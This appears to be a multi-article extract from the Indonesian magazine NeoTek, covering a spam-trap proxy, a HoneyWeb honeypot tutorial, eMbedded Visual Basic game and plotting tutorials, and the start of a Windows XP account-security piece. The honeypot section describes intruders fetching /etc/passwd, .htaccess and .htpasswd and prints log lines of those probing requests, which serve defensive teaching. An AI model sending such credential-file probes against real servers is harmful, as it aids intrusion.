                                                                     biaya), atau mengirim sejumlah besar message untuk
                                                                     memastikan spam sampai. Dengan meningkatkan
                                                                     beban permasalahan yang harus ditanggung spammer
                                                                     bisa memaksanya berpikir untuk keluar dari bisnis ini.
                                                                 ?   Spam yang ditangkap bisa dipergunakan untuk penye-
                                                                     lidikan pola, meski kebanyakan open proxy dikonfigu-
                                                                     rasi dengan kurang tepat sehingga menyulitkan spam-
                                                                     hunter yang ingin melacaknya.




Gambar 9. Administrasi Jackpot via web

                                                                                                 Vol. IV No. 11 NeoTek    21
                   NeoTekno


                                                                                                 HONEYPOT
                        Honeypot dengan Python
     Pemanfaatan honeypot untuk menjebak hacker menjadikan honeypot sebuah pilihan yang
             tepat saat ini untuk menciptakan keamanan sistem yang anda miliki. Firrar Utdirartatmo
       (firrar@lycos.com) mengangkat bahasan membuat honeyweb (honeypot web server) dengan
                                                                      menggunakan bahasa phyton.

    P
          ADA PLATFORM L INUX MEMANG TERSEDIA SOFTWARE
         honeypot Honeyd dan Labrea yang cukup power-
         full. Tetapi konfigurasi keduanya agak rumit dan
bisa membuat sakit kepala. Bila yang anda butuhkan se-
kedar honeypot web server saja, anda bisa mencoba
HoneyWeb ini. HoneyWeb dikembangkan dengan bahasa
script Python, yang umumnya sudah tersedia pada distro-
distro Linux modern semacam Mandrake, RedHat dan
SuSE. Dukungan untuk Python biasanya sudah tercakup
dalam instalasi default distro Linux, seperti halnya untuk
PERL. Contohnya di sini penulis mencoba dengan distro            Gambar 1. Halaman web default
Mandrake 9.0, dan bisa segera menjalankan HoneyWeb,
                                                                 Pada Apache kita ketahui ada file .htaccess dan .htpasswd
tanpa memusingkan masalah keberadaan library-library
                                                                 yang menentukan autentifikasi untuk akses page di suatu
semacam libdnet, libpcap, dan libevent, yang biasanya
                                                                 direktori. Seorang hacker biasanya akan mencoba mengam-
diperlukan untuk instalasi software honeypot di Linux.
                                                                 bil file-file tersebut. Anda bisa mengubahnya, yaitu file
HoneyWeb memerlukan Python versi 1.5 ke atas.
                                                                 htaccess.txt dan htpasswd.txt di direktori attack-pages. Se-
Pada dasarnya HoneyWeb bekerja dalam dua mode yaitu:             benarnya di sini orang akan sukses mengambil file tersebut
? Persistent: HoneyWeb akan mengingat IP pengakses               tanpa peduli direktori mana yang diketikkan di browser.
   dan selalu mengembalikan versi yang sama untuk IP
   tersebut, pada rentang waktu tertentu. Ia juga akan
   melakukan perbandingan request untuk menentukan
   apakah akan mengembalikan 404 atau tidak.
?    Non-Persistent: Mekanismenya mirip Netcat dengan
     mengembalikan 200 OK untuk setiap request (kecuali
     ditentukan lain), beserta header yang berkaitan untuk
     tipe server tersebut
Lakukan ekstraksi file instalasi dengan perintah:
tar -zxvf HoneyWeb-0.4.tar                                       Gambar 2. Mengakses file         Gambar 3. Mengakses file
                                                                 .htaccess                        .htpasswd
Bila pada Perl suatu script biasanya ditandai dengan eksten-
sion .pl, maka pada Python ditandai dengan ekstension
                                                                 Dan tentu saja yang akan selalu dicoba diambil oleh hacker
.py. Anda bisa mengamati hasil ekstraksi terdiri dari sejum-
                                                                 adalah /etc/passwd. Anda bisa mengubah sendiri file bo-
lah script Python dan direktori docs, html, log, dan scripts.
                                                                 hongan ini pada passwd.txt di direktori attack-pages.
Masuklah ke direktori scripts dan jalankan strict_gen.py:
./strict_gen.py
HoneyWeb bisa juga dijalankan terintegrasi dengan Honeyd,
tetapi kita di sini jalankan sebagai aplikasi standalone,
pindahlah dulu ke direktori utama hasil ekstraksi
HoneyWeb, jalankan:
./HoneyWeb-Server-0.4.py
Bila ingin mengetahui sejumlah informasi mengenai Honey-
Web anda bisa membaca file Install dan README di
direktori docs. Kita bisa menentukan page bohongan yang
dibikin agar sesuai kenyataan, lihatlah direktori html, di-
mana page bisa diletakkan pada direktori attack-pages, se-
dang pesan-pesan kesalahan pada direktori error-pages.
Konfigurasi lebih jauh bisa anda lihat di file hweb_config.py,
sementara informasi log bisa anda lihat pada direktori log.
Misal kita coba akses dari komputer lain, yang ditampilkan       Gambar 4. Mengambil file /etc/passwd
secara default adalah file index.html di direktori html.
Anda bisa mengubah page ini bila perlu.                          Anda bisa memeriksa koneksi yang terjadi pada file hw-

22      NeoTek Vol. IV No. 11
                                                                                                            NeoTekno

log.txt di direktori log. Contoh (sejumlah baris log senga-              w_serv['win_1'] = 'Microsoft-IIS/5.0'
ja kita potong untuk menyederhanakan):                                   w_serv['win_2'] = 'Microsoft-IIS/4.0'
                                                                         w_serv['win_3'] = 'Microsoft-IIS/3.0'
192.168.0.1:32770:fire.gejayan.id:[19/Nov/2003 21:20:35]
                                                                         w_serv['win_4'] = 'Microsoft-IIS/6.0'
 Request:GET / HTTP/1.0:200
 Return:Apache
 host:192.168.0.1
 user-agent:Lynx/2.8.5dev.8 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6e
192.168.0.2:1026:192.168.0.2:[20/Nov/2003 09:40:40]
 Request:GET / HTTP/1.1:200
 Return:Netscape-Enterprise/4.1
 user-agent:Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
192.168.0.2:1027:192.168.0.2:[20/Nov/2003 09:41:20]
 Request:GET /tes.html HTTP/1.1:200
 Return:Netscape-Enterprise/4.1
 user-agent:Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
192.168.0.2:1031:192.168.0.2:[20/Nov/2003 09:42:17]
 Request:GET /cgi-bin/ HTTP/1.1:200                                      Gambar 6. Direktori bohongan yang ditampilkan
 Return:Netscape-Enterprise/4.1
 user-agent:Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)       Bila anda pilih win_4 berarti anda mengemulasikan
192.168.0.2:1034:192.168.0.2:[20/Nov/2003 09:42:30]                      Microsoft-IIS/6.0. Request yang tidak bisa dipenuhi
 Request:GET /cgi-bin/tes.html HTTP/1.1:200                              dicatat dalam file newsigs.txt.
 Return:Netscape-Enterprise/4.1                                          Kadang penyusup mencoba mengintip direktori di server,
 user-agent:Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)       misal user ~root atau ~nobody. Kalau anda pada gambar
192.168.0.2:1036:192.168.0.2:[20/Nov/2003 09:43:50]                      6, itu diambil dari file apache-dir.html di direktori
 Request:GET /.htaccess HTTP/1.1:200                                     html/attack-pages.
 Return:Netscape-Enterprise/4.1
 user-agent:Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
192.168.0.2:1047:192.168.0.2:[20/Nov/2003 09:49:10]                       Overview Python
 Request:GET /apaaja/.htpasswd HTTP/1.1:200

                                                                            P
                                                                                   YTHON ADALAH BAHASA PEMROGRAMAN BERORIENTASI
 Return:Netscape-Enterprise/4.1                                                    object yang portabel. Dikembangkan sejak 1990 di CWI
 user-agent:Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)                 Amsterdam oleh Guido van Rossum, dan dilanjutkan
192.168.0.10:1025:192.168.0.10:[20/Nov/2003 10:13:20]                     oleh Python Software Foundation. Pada awalnya Python banyak
 Request:GET / HTTP/1.0:200                                               dipengaruhi oleh bahasa ABC, Modula-2, Lisp, C, dan shell
                                                                          script. Meski mirip nama spesies ular, sebenarnya Python berasal
 Return:Microsoft-IIS/6.0
                                                                          dari nama Monty Python.
 user-agent:Lynx/2.8.4dev.7 libwww-FM/2.14
                                                                          Bahasa ini memiliki sintaks yang elegan serta tipe data built-in
Nampak di situ akses dari tiga buah komputer:                             yang cukup powerful. Banyak modul tambahan telah dikembang-
192.168.0.1, 192.168.0.2 dan 192.168.0.10. Apa yang coba                  kan untuk Python, misal library standar semacam math library
diambil oleh pengakses nampak pada Request. Kita tahu                     dan regular expression, library spesifik untuk suatu platform
dari user-agent bahwa tiap pengakses memakai browser/-                    misal Windows, jaringan IP, X Window, dan aplikasi spesifik se-
sistem berikut: Lynx 2.8.5, IE5 di Windows 98, dan Lynx                   macam pemrosesan image atau suara. Python bisa saja memakai
2.8.4. Dimana web server yang dikembalikan berbeda-                       modul-modul dari bahasa semacam C/C++.
beda (Return:) untuk tiap pengakses, pada contoh di atas.                 Para pengguna Linux biasanya dapat menemukan intepreter Python
Apache, Netscape-Enterprise/4.1, Microsoft-IIS/6.0. Nilai                 dalam distro mereka, seperti halnya Perl dan Tcl. Python seolah
itu ditentukan dari baris berikut pada file konfigurasi                   menjadi jalan tengah, antara kubu programmer script generasi baru
hweb_config.py:                                                           yang biasanya berasal dari web programming dengan ASP/PHP,
                                                                          dengan programmer ala old-fashion-way yang lebih senang me-
Default_Server =                                                          makai Perl atau shell programming (dan terobsesi mengotomasi-
random_any'                                                               sasikan segala pekerjaan admin Linux). Python juga memiliki se-
Arti nilai di atas, web server yang diemulasikan adalah                   jumlah fleksibilitas ketimbang C.
                                   acak. Nilai lain yang bisa             Python telah dipakai sebagai pengenalan untuk bahasa pemro-
                                   ditentukan adalah:                     graman karena mudah dipelajari, tetapi juga dimanfaatkan oleh
                                   random_win,                            pengembang software professional semacam Google, NASA, dan
                                   random_unix,                           Industrial Light & Magic. Hewlett-Packard dan Compaq menyer-
                                   random_all. Atau                       takan Python, dan menulis sejumlah tool administrasi dengan
                                   menentukan versi terten-               Python. Semua instalasi default komputer Apple dengan Mac OS
                                                                          X memiliki Python di dalamnya. Singkatnya, meski sederhana
                                   tu: unix_1, unix_2, dan
                                                                          tetapi Python mampu mendukung pembuatan program berukuran
                                   seterusnya atau win_1,                 besar.
                                   win_2 dan seterusnya,
                                   tergantung kelengkapan                 Selain pada Linux dan varian Unix, Python bisa berjalan pada
                                   yang tersedia pada file                platform: OS/2, Windows, Macintosh. Semua versi Python terse-
                                                                          dia secara gratis. Sumber informasi lebih lanjut bisa diperoleh
                                   konfigurasi. Misal bila di
                                                                          pada www.python.org. Anda juga bisa memperoleh interpreter
                                   file konfigurasi ada baris             Python yang ditulis dalam bahasa Java di www.jpython.org.
Gambar 5. Request yang tidak cocok berikut:



                                                                                                            Vol. IV No. 11 NeoTek       23
                  NeoTutor


                                                 EMBEDDED VISUAL BASIC
                       Membuat Aplikasi Plot3D
          Game menjadi kebutuhan untuk mengisi hari-hari kosong ataupun sekedar hiburan setelah
           berhadaan dengan pekerjaan di kantor yang seabrek banyaknya, tetapi terkadang kala muncul
     pertanyaan mengenai cara membuat game. Fitrianto Halim (fitriantoh@hotmail.com) membahas
                           bermacam-macam pembuatan game sederhana yang berjalan di PocketPC.

 B
         IDANG KOMPUTASI TENTUNYA TIDAK LEPAS DARI BI -      Option Explicit
        dang matematika. Pada artikel kali ini, penulis      Dim high(640), low(640)
        akan mengajak Anda untuk membuat aplikasi            Dim XMin, XMax, YMin, YMax, ZMin, ZMax, XLines, YLines As Single
Plot3D, sebuah aplikasi sederhana untuk membuat grafik       Dim Tilt, CTilt, STilt, Rota, CRota, SRota As Single
3 dimensi berdasarkan suatu rumusan matematika terten-       Dim XMean, XDiff, YMean, YDiff, ZMean, ZDiff, XPlot, YPlot As Single
tu dan khusus untuk dijalankan pada PocketPC.                Dim nFunc As Byte
Aplikasi Plot3D ini merupakan konversi dari versi BASICA     Dim Hide As Boolean
atau GWBASIC (diambil dari buku 100 Ready-to-run             Private Sub Form_Load()
Programs & Subroutines for The IBM PC karangan Jeff           Call ResetGraph
Bretz dan John Clark Craig) ke eMbedded Visual Basic.         Call ResetData
Selain itu, penulis menambahkan lima buah fungsi             End Sub
matematis tambahan ke dalamnya.
                                                             Private Sub Command1_Click()
Desain Program                                                Form2.Show
Aplikasi terdiri atas dua buah form, di mana form pertama    End Sub
merupakan form utama sedangkan form kedua untuk              Private Sub Command2_Click()
menginput data. Desain form pertama dan form kedua            Call PlotGraph(1)
bisa dilihat pada gambar 1 dan 2.                            End Sub
                                                             Private Sub Command3_Click()
                                                              Call PlotGraph(2)
                                                             End Sub
                                                             Private Sub Command4_Click()
                                                              Call PlotGraph(3)
                                                             End Sub
                                                             Private Sub Command5_Click()
                                                              Call PlotGraph(4)
                                                             End Sub
                                                             Private Sub Command6_Click()
                                                              Call PlotGraph(5)
                                                             End Sub
                                   Gambar 1. Design form     Private Sub Command7_Click()
                                   pertama                      Call PlotGraph(6)
                                                             End Sub
                                                             Private Sub CalcPlot(x, y)
                                                              Dim z, x2, y2, z2, x3, y3 As Single
                                                              Select Case nFunc
                                                               Case 1
                                                                z = MyFunc1(x, y)
                                                               Case 2
                                                                z = MyFunc2(x, y)
                                                               Case 3
                                                                 z = MyFunc3(x, y)
                                                               Case 4
                                                                 z = MyFunc4(x, y)
                                                               Case 5
                                                                z = MyFunc5(x, y)
                                                               Case 6
                                   Gambar 2. Design form
                                                                z = MyFunc6(x, y)
                                   kedua

                                                            TextBox 1. Source code form pertama (source code lengkap dapat
Pada form pertama, masukkan source-code berikut:
                                                            dilihat pada lampiran yang disediakan di dalam CD)


24    NeoTek Vol. IV No. 11
                                                                                                   NeoTutor

Pada form kedua, masukkan source-code berikut:                 ·    Enter Z range 0/750
                                                               ·    Tilt angle (degrees)     45
    Option Explicit
    Private Sub Form_Activate()                                ·    Rotation angle (degrees) 30
     Text1.SetFocus                                            ·    Number of X lines to plot 16
    End Sub
                                                               ·    Number of Y lines to plot 16
    Private Sub Command1_Click()
     Form2.Hide                                                Rumus keenam :
    End Sub                                                    ·    Enter X range -15/15

TextBox 2. Source code form kedua                              ·    Enter Y range 1/15

Percobaan                                                      ·    Enter Z range -1/1

Seperti tertulis pada bagian awal, ada enam pilihan rumu-      ·    Tilt angle (degrees)     45
san matematis yang tersedia. Oleh karena itu, penulis          ·    Rotation angle (degrees) 45
akan memberikan contoh-contoh pengisian form serta             ·    Number of X lines to plot 31
hasil grafis yang dihasilkan (hasil grafis bisa dilihat pada
gambar 3 hingga gambar 8).                                     ·    Number of Y lines to plot 15

Rumus pertama :                                                Khusus untuk bagian Want hidden line removal , anda
                                                               bisa memilih Yes atau No, di mana bila dipilih Yes maka
·     Enter X range -17/17
                                                               grafis yang dihasilkan lebih halus, karena menghilangkan
·     Enter Y range -17/17                                     garis-garis yang tidak diperlukan (pada gambar-gambar
·     Enter Z range -1/2                                       yang disertakan, merupakan hasil dari pilihan Yes untuk
                                                               Want hidden line removal).
·     Tilt angle (degrees)        45
                                                               Penutup
·     Rotation angle (degrees) 30
                                                               Tentunya, aplikasi Plot3D ini masih sederhana, karena be-
·     Number of X lines to plot 35                             lum memiliki error handler (penanganan kesalahan), clip-
·     Number of Y lines to plot 35                             ping area (agar grafis yang dihasilkan tidak di luar bidang
                                                               gambar dan lain-lain. Silahkan Anda mengembangkannya.
Rumus kedua :
·     Enter X range -30/30
·     Enter Y range -30/30
·     Enter Z range -300/300
·     Tilt angle (degrees)        45
·     Rotation angle (degrees) 30
·     Number of X lines to plot 61
·     Number of Y lines to plot 61
Rumus ketiga :                                                     Gambar 3. Hasil rumus            Gambar 4. Hasil rumus kedua
                                                                   pertama
·     Enter X range -45/45
·     Enter Y range -45/45
·     Enter Z range -1/3
·     Tilt angle (degrees)        45
·     Rotation angle (degrees) 45
·     Number of X lines to plot 46
·     Number of Y lines to plot 46
Rumus keempat :
                                                                   Gambar 5. Hasil rumus ketiga     Gambar 6. Hasil rumus
·     Enter X range -25/25                                                                          keempat
·     Enter Y range -25/25
·     Enter Z range -5000/500
·     Tilt angle (degrees)        45
·     Rotation angle (degrees) 30
·     Number of X lines to plot 26
·     Number of Y lines to plot 26
Rumus kelima :
·     Enter X range -15/15                                         Gambar 7. Hasil rumus            Gambar 8. Hasil rumus
                                                                   kelima                           keenam
·     Enter Y range -15/15

                                                                                                   Vol. IV No. 11 NeoTek      25
                     NeoTutor


                                                 EMBEDDED VISUAL BASIC
                            Membuat Aplikasi Puzzle
          Game menjadi kebutuhan untuk mengisi hari-hari kosong ataupun sekedar hiburan setelah
           berhadaan dengan pekerjaan di kantor yang seabrek banyaknya, tetapi terkadang kala muncul
     pertanyaan mengenai cara membuat game. Fitrianto Halim (fitriantoh@hotmail.com) membahas
                           bermacam-macam pembuatan game sederhana yang berjalan di PocketPC.

 A
         A PAKAH ANDA PENGGEMAR PUZZLE ATAU PUZZLE               If y >= 0 And y <= 4 And x >= 0 And x <= 4 Then lLoop = False
         mania? Pada artikel kali ini penulis akan memba-       End If
         has cara membuat aplikasi puzzle pada PocketPC.       Wend
Di pasaran, tentunya cukup banyak variasi permainan            ArrData(XNul, YNul) = ArrData(x, y)
puzzle, di mana salah satunya akan kita bahas di sini.         ArrData(x, y) = " "
Permainan puzzle yang penulis buat, idenya berasal dari        XNul = x
sebuah permainan puzzle konvensional (terbuat dari plas-       YNul = y
tik) yang dapat dikatakan merupakan permainan favorit          If n = 1 Then
penulis sewaktu masih kecil. Pada puzzle tersebut terdapat      c = "R"
bagian kosong (biasanya diambil dari pojok kanan bawah),       ElseIf n = 2 Then
                                     sehingga dengan de-        c = "D"
                                     mikian arah perge-        ElseIf n = 3 Then
                                     rakannya ada empat         c = "L"
                                     kemungkinan, yaitu:       Else
                                     ke atas, bawah, kiri,      c = "U"
                                     dan kanan.                End If
                                                               nLast = n
                                     Desain Program            ArrStep(nAcak - i) = c
                                     Aplikasi terdiri atas     Next
                                     sebuah form utama,        Call ChangeAllCaption
                                     di mana desainnya        End Sub
                                     bisa dilihat pada        Private Sub Form_Load()
                                     gambar 1.                 Call ResetData
                                      Perhatikan, bahwa        Call ResetGraph
                                      urutan label seperti     nAcak = 5
                                      tertera pada gambar.     lPlay = False
Gambar 1. Form utama
                                      Bila Anda perhati-       Randomize
                                      kan, maka tampak        End Sub
seperti kotak ajaib, di mana hasil penjumlahan kolom atau     Private Sub Label1_Click()
pada form utama, masukkan source-code berikut:                 If lPlay Then Call Uji(0, 0)
                                                              End Sub
 Option Explicit
                                                              Private Sub Label2_Click()
 Dim ArrData(4, 4)
                                                               If lPlay Then Call Uji(0, 1)
 Dim ArrStep(24)
                                                              End Sub
 Dim nAcak, XNul, YNul As Byte
 Dim lPlay As Boolean                                         Private Sub Label3_Click()
 Private Sub AcakData()                                        If lPlay Then Call Uji(0, 2)
  Dim lLoop As Boolean                                        End Sub
  Dim i, nLast, n, x, y As Byte                               Private Sub Label4_Click()
  Dim c As String                                              If lPlay Then Call Uji(0, 3)
  nLast = 10                                                  End Sub
  For i = 1 To nAcak
                                                              Private Sub Label5_Click()
   lLoop = True
                                                               If lPlay Then Call Uji(0, 4)
   While lLoop
                                                              End Sub
    x = XNul
    y = YNul                                                  Private Sub Label6_Click()
    n = Int(4 * Rnd() + 1)                                     If lPlay Then Call Uji(1, 0)
    If Abs(nLast - n) <> 2 Then                               End Sub
     If n = 1 Or n = 3 Then                                    If lPlay Then Call Uji(1, 1)
      y=y+n-2
     Else
      x=x+n-3                                                TextBox 1. Source code formutama (source code lengkap dapat dilihat
     End If                                                  pada lampiran yang disediakan di dalam CD)


26    NeoTek Vol. IV No. 11
                                                                                                 NeoTutor

Di sini, penulis memanfaatkan kejadian (event) yang ter -       eMbedded Visual Basic
jadi pada object Label, yaitu Click (atau pada PocketPC di-
kenal dengan istilah tap). Penulis sengaja memilih object       Baru mengenal eVB? eVB
Label, agar mempermudah dalam pembuatan aplikasi.               merupakan singkatan dari
                                                                eMbedded Visual Basic. Se-
                           Cara kerja program                   perti halnya Visual Basic
                            Saat pertama kali dijalankan,       (keluaran Microsoft) yang
                            tampilan aplikasi puzzle bisa di-   merupakan bahasa pemro-
                            lihat pada gambar 2.                gmanan yang telah ada, be-
                                                                gitu juga dengan eVB me-
                            Button Init berguna untuk me-       rupakan bahasa pemrogra-
                            nentukan jumlah pengacakan          man yang digunakan untuk
                            (default awal adalah 5), di mana    menciptakan program apli-
                            bisa Anda isi dari 5 hingga 25.     kasi yang dapat berjalan di
                            Penulis pilih 25 untuk angka        Pocket PC yang mengguna-
                                                                kan Windows CE. Tidak ha-
Gambar 2. Tampilan puzzle   maksimal, karena menurut pe-
                                                                nya Visual Basic yang me-
                            nulis lebih dari cukup (silahkan    miliki eVB, ada juga untuk
                            Anda modifikasi programnya,         Visual C yang diberi nama
                            kalau angka 25 masih kurang         eVC (eMbedded Visual C).
                            memadai).
                                                                Penggunaan Pocket PC di
                         Button Play berguna untuk me-          jaman sekarang ini, mung-
                         mulai program. Perhatikan, bah-        kin tidak lagi asing karena
                         wa kemudian akan dilakukan             selain produknya sudah me-
                         pengacakan, dimana jumlahnya           nghiasi etalase di toko-toko Pocket PC keluaran iPAQ
                         disesuaikan dengan yang Anda           komputer, harganya juga
                         masukkan pada button Init atau         kian makin terjangkau.
Gambar 3. Pengacakan 5   dipergunakan nilai default 5. Per-     Pocket PC diciptakan karena gaya hidup (life style) jaman modern
                         hatikan gambar 4, button Play          seperti sekarang ini membutuhkan sesuatu yang praktis. Praktis
                         kini beralih menjadi button Stop.      dalam arti kata simpel dan sangat mudah dibawa-bawa (mobile).

                         Button Stop berguna untuk              Komputer yang pertama kali hadir dengan fisik yang besar dan
                         menghentikan jalannya aplikasi         bobot yang sangat berat, terus dan terus berkembang seiring
                                                                perkembangan jaman dimana gaya hidup mendapat prioritas
                         puzzle yang belum selesai atau
                                                                utama dalam menghadirkan teknologi-teknologi canggih. Pocket
                         mungkin Anda bingung dengan            PC adalah generasi lanjutan dari sebuah komputer PC, dapat de-
                         penyelesaian dari puzzle yang          ngan mudah dibawa kemana saja karena ukuran yang kecil dan
                         sedang Anda mainkan. Bila Anda         simple dan memiliki kemampuan yang tidak kalah dengan sau-
                         bingung dengan penyelesaian            dara tuanya yaitu PC Desktop.
                         dari puzzle yang sedang Anda           Seiring perkembangan komputer dan telekomunikasi, kini juga
Gambar 4. Button “Stop”  mainkan, Anda bisa memilih Yes         hadir Pocket PC yang tidak hanya berposisi sebagai komputer
                         untuk Lihat Langkah Puzzle.            kantong, lebih dari itu kini sudah bertambah fungsi sebagai
Yang perlu diperhatikan, langkah-langkah puzzle yang di-        Handphone. Asyik sekali, bukan?
tampilkan bukan untuk memperbaiki langkah yang telah
                                                                Apakah harganya mahal? Ternyata tidak demikian, cek dan ricek
Anda mainkan hingga selesai, tetapi berdasarkan apa yang        di www.bhineka.com dan anda akan menemukan Pocket PC
ditampilkan sewaktu Anda menekan button Play.                   yang juga berfungsi sebagai Handphone dengan harga murah.
Perhatikan bahwa langkah-langkah puzzle menggunakan             Apakah anda tergiur?
singkatan: D(own), L(eft), R(ight) dan U(p). Ini berarti,       Bahasan mengenai eVB baik pengenalannya maupun program-
langkah-langkah puzzle adalah:                                  mingnya, telah dibahas sebelumnya di edisi Neotek Volume IV -
                                                                Nomor 07 dengan penulisnya Fitrianto Halim (fitriantoh@yahoo.com).
·   Up atau huruf T
                                                                Dan dalam bahasan edisi ini, kembali saudara Fitrianto Halim
·   Left atau huruf O                                           berbagi pengetahuan mengenai pemrograman eVB dengan tema
                                                                bahasan membuat game untuk aplikasi Pocket PC.
·   Down atau huruf N
                                                                Pembahasan mengenai Pocket PC juga telah hadir di edisi Neotek
·   Down atau huruf S                    Gambar 5. langkah-     Volume IV - Nomor 07, kembali dengan penulisnya yaitu Fitrianto
·   Right atau huruf X                   langkah puzzle                          Halim dan akan terus hadir pada bahasan
                                                                                 Neotek untuk nomor-nomor selanjutnya.
Setelah selesai mengamati langkah-langkah puzzle, maka                           Sangat baik buat anda yang ingin terjun se-
Anda bisa menekan button Cont.                                                   bagai programming aplikasi Pocket PC atau
Penutup                                                                          bagi anda yang hanya berminat dengan
                                                                                 informasi yang berhubungan dengan Pocket
Masih banyak yang bisa Anda kembangkan dari aplikasi                             PC.
ini, misalkan mengoptimasi program. Maklum, aplikasi
                                                                                   Pastikan anda tidak tertinggal akan bahasan-
puzzle ini penulis buat sekitar 4-5 jam untuk mengisi wak-                         bahasan di NeoTek, karena saudara Fitrianto
tu malam minggu. Selain itu, Anda bisa menambahkan va-                             Halim banyak menuliskan pengetahuannya
riasi lainnya. Misalkan bagian kosong bukan lagi berasal                           yang erat kaitannya dengan Mobile Phone
dari pojok kanan bawah, tetapi dipilih secara ran dom. Atau                        dan Java Programming untuk dibagikan
bisa pula menambahkan timer, untuk mengetahui berapa                               khusus kepada pembaca NeoTek demi me-
waktu yang Anda butuhkan untuk menyelesaikan sebuah             Smartphone O2      nambah wawasan mengenai Teknologi
puzzle (siapa tahu bisa memecahkan rekor Guiness Book).         menggunakan Ms     Informasi dan Teknologi Komunikasi.
                                                                PocketPC 2003

                                                                                                 Vol. IV No. 11 NeoTek         27
                     NeoTutor


                                                  EMBEDDED VISUAL BASIC
                   Membuat Aplikasi TicTacToe
          Game menjadi kebutuhan untuk mengisi hari-hari kosong ataupun sekedar hiburan setelah
           berhadaan dengan pekerjaan di kantor yang seabrek banyaknya, tetapi terkadang kala muncul
     pertanyaan mengenai cara membuat game. Fitrianto Halim (fitriantoh@hotmail.com) membahas
                           bermacam-macam pembuatan game sederhana yang berjalan di PocketPC.

 M
         UNGKIN TIDAKLAH LENGKAP RASANYA, KALAU PENU-             End If
         lis belum mengulas bagaimana membuat aplikasi          End Sub
         permainan (game) pada PocketPC. Oleh karena
                                                                Private Sub Label2_Click()
itu, pada artikel kali ini penulis akan membahas cara
                                                                   If nStep < 9 Then
membuat aplikasi TicTacToe.
                                                                       If Label2.Caption = "" Then
                                      Aplikasi TicTacToe                   Call TicTacToeStep(2)
                                      ini merupakan kon-               Else
                                      versi dari versi BASI-               Call TicTacToePosFilled
                                      CA atau GWBASIC                  End If
                                      (diambil dari buku           End If
                                      Teori dan Aplikasi        End Sub
                                      Komputer Bahasa
                                                                Private Sub Label3_Click()
                                      BASIC - edisi 4 ka-
                                      rangan Jogiyanto         TextBox 1. Source code formutama (source code lengkap dapat dilihat
                                      H.M) ke eMbedded         pada lampiran yang disediakan di dalam CD)
                                      Visual Basic.
                                      Desain Program           Di sini, penulis memanfaatkan kejadian (event) yang ter-
                                                               jadi pada object Label, yaitu Click (atau pada PocketPC di-
                                      Aplikasi terdiri atas    kenal dengan istilah tap). Penulis sengaja memilih object
                                      sebuah form utama,                                   Label, agar mempermudah
                                      di mana desainnya                                    dalam pembuatan aplikasi (ti-
Gambar 1. Tampilan form utama         bisa dilihat pada                                    dak perlu memakai control yang
                                      gambar 1.                                            berkaitan dengan picture).
Perhatikan, bahwa urutan label seperti tertera pada gam-                                      Yang perlu diperhatikan adalah,
bar. Bila Anda perhatikan, maka tampak seperti kotak ajaib,                                   aplikasi TicTacToe ini agak lain
di mana hasil penjumlahan kolom atau baris atau sisi dia-                                     dari biasanya. Hal ini diseba-
gonal sama dengan lima-belas.                                                                 bkan, karena PocketPC selalu
Pada form utama, masukkan source-code berikut:                                                yang melangkah terlebih da-
                                                                                              hulu, perhatikan gambar 2.
 Option Explicit                                                                              Oleh karena itu, perhitungan
 Dim lFinish As Boolean                                                                       selalu dilakukan pada langkah
 Dim nPos As Integer                                                                          ketiga, kelima, ketujuh serta
 Dim nStep As Byte                                                                            langkah kesembilan (langkah
 Dim TheSteps(9)                                               Gambar 2. PocketPC             kesembilan hanya tinggal me-
                                                               melangkah terlebih dahulu      ngisi posisi yang masih ko-
 Private Sub Form_Load()
                                                                                              song), karena langkah kedua,
    Call ResetGraph
                                                                                              keempat, keenam serta langkah
    Call ResetData
                                                                                              kedelapan adalah langkah dari
 End Sub
                                                                                              pemain. Akibatnya, hasil akhir
 Private Sub Command1_Click()                                                                 permainan TicTacToe ini ada
    Call ResetData                                                                            dua kemungkinan, yaitu
    nStep = 1                                                                                 PocketPC menang atau remis.
    nPos = 5
                                                                                              Penutup
    TheSteps(nStep) = nPos
    Call ChangeCaption("X")                                                                   Tentunya..., dari artikel ini
 End Sub                                                                                      penulis berharap Anda bisa
                                                                                              memiliki gambaran tentang
 Private Sub Label1_Click()                                                                   aplikasi permainan (game) apa
    If nStep < 9 Then                                                                         saja yang bisa dikembangkan
        If Label1.Caption = "" Then                                                           pada PocketPC. Perhatikan
            Call TicTacToeStep(1)                                                             bahwa pemakai PocketPC
        Else                                                   Gambar 3. Remis jika tidak     menggunakan stylus untuk
            Call TicTacToePosFilled                            ada yang memenangkan           input device.
        End If                                                 game

28    NeoTek Vol. IV No. 11
                                                                                                 NeoTekno


                                                               WINDOWS SECURITY
                                  Utak-atik User Account
    Penggunaan Windows XP yang memiliki tampilan yang menarik begitu juga fungsi-fungsi yang
               dimilikinya, salah satu fungsi yang disediakannya yaitu User Account. Fitrianto Halim
(fitriantoh@hotmail.com) membahas dari sisi sekuritas dan efektifitas berkaitan dengan User Account
         yang berguna untuk membagi hak akses pengguna antara Administrator dan pengguna biasa.

W
         INDOWS XP PROFESSIONAL MERUPAKAN KELUARGA             Computer Management atau memberikan password
         Windows NT seperti halnya Windows 2000 dan            untuk meningkatkan sisi sekuritas.
         Windows 2003, namun dengan tampilan yang              Computer Management
user friendly.
                                                               Menu Computer Management bisa diperoleh dari
Hal tersebut bisa dilihat dari fasilitas untuk logon, dimana   Control Panel>Administrative Tools atau dari
bisa dipilih apakah menggunakan welcome screen atau            Start>Programs>Administrative Tools (bila Anda meng-
menggunakan classic logon prompt.                              aktifkannya pada Taskbar and Start Menu).
Pada artikel ini, penulis akan membahas hal-hal yang ber-                                                 Hal-hal yang ber-
kaitan dengan user account pada Windows XP Professio-                                                     kaitan dengan ma-
nal, di mana pengetahuan ini diharapkan bisa meningkat-                                                   salah user account
kan sisi sekuritas dan efektifitas.                                                                       bisa diperoleh pa-
User Account Administrator                                                                                da percabangan
Setelah selesai instalasi Windows XP Professional, kita di-                                               (tree) Computer
minta untuk membuat (create) maksimal hingga lima                                                         Management
buah user account (minimal satu buah user account), di                                                    (Local)>System
mana nantinya keseluruhan user account tersebut masuk                                                     Tools>Local Users
ke dalam group Administrators.                                                                            and
                                                                                                          Groups>Users.
                             Saat pertama kali kita masuk
                             ke dalam Windows XP Pro-          Gambar 2. Mengaktifkan Computer         Tampak bahwa
